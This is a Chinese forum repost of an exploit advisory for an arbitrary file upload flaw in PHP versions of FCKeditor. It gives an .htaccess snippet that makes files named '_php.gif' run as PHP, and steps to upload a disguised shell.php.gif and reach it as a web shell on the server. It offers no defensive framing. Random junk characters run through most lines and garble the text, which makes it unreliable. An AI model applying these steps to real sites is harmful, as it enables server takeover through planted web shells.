FCKeditor所有php版本Upload上传漏洞+ d- ^) |+ }7 }9 }: e6 i, N7 R
作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:07
+ `1 x. T a; B" q2 V( n. J减小字体 增大字体! J1 k+ T# A$ i
[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability7 }- C1 l3 F. k. t$ v3 Y% O3 {( ]# x$ S
[+] Date: 2011
) M7 `( _' w7 ^# E[+] Author : sinesafe.cn; _0 e; w9 A' x+ A$ E( W- ], H
[+] Website : WwW.sinesafe.cn3 V9 A0 { c3 ` ?
———————————————————
) T* _& N/ Z6 C7 b3 `6 ?( s( |1.create a htaccess file:- W6 M9 [ b0 F0 j
code:
" f7 K, H; n5 R<FilesMatch “_php.gif”>
0 ^8 B" {& e) O. X' V3 _1 k* WSetHandler application/x-httpd-php) e4 R. F. X2 W1 e6 _! D2 n2 N
</FilesMatch> S S/ N1 Y) H) }3 C' ^# B
' U! ]+ e6 T' y( T& g9 o% I2.Now upload this htaccess with FCKeditor.+ k/ F1 _: v5 k; `! j* x
' p+ F) X4 m- K) _( a+ V8 H% Vhttp://www.sinesafe.cn/FCKeditor ... er/upload/test.html
@% m/ X/ E7 Z/ v5 M; C/ K m; c: L5 b# o. u! F
http://www.sinesafe.cn/FCKeditor ... onnectors/test.html2 D4 y. i. r/ a3 `" f
. g/ R2 j9 D& V" k# Q+ @6 _. G" J% U
———————————————————————————————-+ i4 y ]0 U+ [( t6 v7 N+ G
3.Now upload shell.php.gif with FCKeditor.5 _0 G( U) [1 \0 j
4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.
" t3 E" |! @ z! e( I5.http://www.sinesafe.cn/anything/shell_php.gif
4 d+ Q, x" g" Y, q' s4 s. O$ I6.Now shell is available from server. |
+ T$ E8 v* \9 r
6 ` ]9 |' B2 j2 u9 R3 b# L/ _
- Q1 x7 h9 s+ b& U6 D: P4 ^. ~ |
发表于 2013-10-27 17:25:21
收藏
支持
反对